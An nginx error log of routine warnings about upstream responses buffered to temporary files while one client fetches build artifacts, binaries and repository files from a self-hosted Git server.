2026/02/17 16:01:37 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/36/0000014361 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz"
2026/02/17 16:01:53 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/36/0000014362 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz"
2026/02/17 16:02:00 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/36/0000014363 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz"
2026/02/17 16:02:40 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/36/0000014364 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz"
2026/02/17 16:03:18 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/36/0000014365 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz"
2026/02/17 16:03:24 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/36/0000014366 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz"
2026/02/17 16:03:28 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/36/0000014367 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz"
2026/02/17 16:04:01 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/36/0000014368 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz"
2026/02/17 16:04:08 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/36/0000014369 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz"
2026/02/17 16:04:27 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/37/0000014370 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz"
2026/02/17 16:04:30 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/37/0000014371 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz"
2026/02/17 16:04:31 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/37/0000014372 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz"
2026/02/17 16:04:43 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/37/0000014373 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz"
2026/02/17 16:04:48 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/37/0000014374 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz"
2026/02/17 16:04:51 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/37/0000014375 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz"
2026/02/17 16:05:02 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/37/0000014376 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz"
2026/02/17 16:05:05 [warn] 921#921: *63324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/37/0000014377 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz"
2026/02/17 16:14:20 [warn] 921#921: *65830 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/12/0000015121 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs"
2026/02/17 16:14:34 [warn] 921#921: *65830 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/12/0000015122 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log"
2026/02/17 16:14:48 [warn] 921#921: *65830 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/12/0000015123 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log"
2026/02/17 16:14:51 [warn] 921#921: *65830 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/12/0000015124 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log"
2026/02/17 16:24:20 [warn] 921#921: *66833 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/12/0000015125 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log?display=source", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log"
2026/02/17 16:29:45 [warn] 921#921: *67836 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/12/0000015126 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/assetpilot.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/assetpilot.ico", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/assetpilot.ico"
2026/02/17 16:40:29 [warn] 919#919: *68852 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/12/0000015127 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3"
2026/02/17 16:41:41 [warn] 919#919: *68852 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/12/0000015128 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html"
2026/02/17 16:43:54 [warn] 919#919: *68852 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/12/0000015129 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-4_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-4_access.log", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log"
2026/02/17 16:46:32 [warn] 919#919: *69854 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/13/0000015130 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log?display=source", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log"
2026/02/17 16:54:50 [warn] 919#919: *69854 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/13/0000015131 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-4_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-4_access.log", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log"
2026/02/17 16:55:43 [warn] 919#919: *70857 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/13/0000015132 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresWatchdog/libssl-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libssl-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libssl-3-x64.dll"
2026/02/17 16:57:37 [warn] 919#919: *70857 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/13/0000015133 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresWatchdog/libcrypto-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libcrypto-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libcrypto-3-x64.dll"
2026/02/17 17:06:01 [warn] 923#923: *71863 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/13/0000015134 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md?display=source", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md"
2026/02/17 17:07:10 [warn] 923#923: *71863 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/13/0000015135 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldPilot/GoldMonitor.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldPilot/GoldMonitor.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.exe"
2026/02/17 17:07:47 [warn] 923#923: *71863 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/13/0000015136 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/.Backup/html/assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/bearing.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/bearing.png"
2026/02/17 17:10:01 [warn] 923#923: *71863 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/13/0000015137 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe"
2026/02/17 17:11:58 [warn] 923#923: *71863 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/13/0000015138 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/chromedriver.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/chromedriver.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/chromedriver.exe"
2026/02/17 17:15:43 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/13/0000015139 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md?display=source", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md"
2026/02/17 17:16:09 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/14/0000015140 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresWatchdog/libiconv-2.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libiconv-2.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libiconv-2.dll"
2026/02/17 17:17:52 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/14/0000015141 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg"
2026/02/17 17:17:55 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/14/0000015142 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg"
2026/02/17 17:17:58 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/14/0000015143 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg"
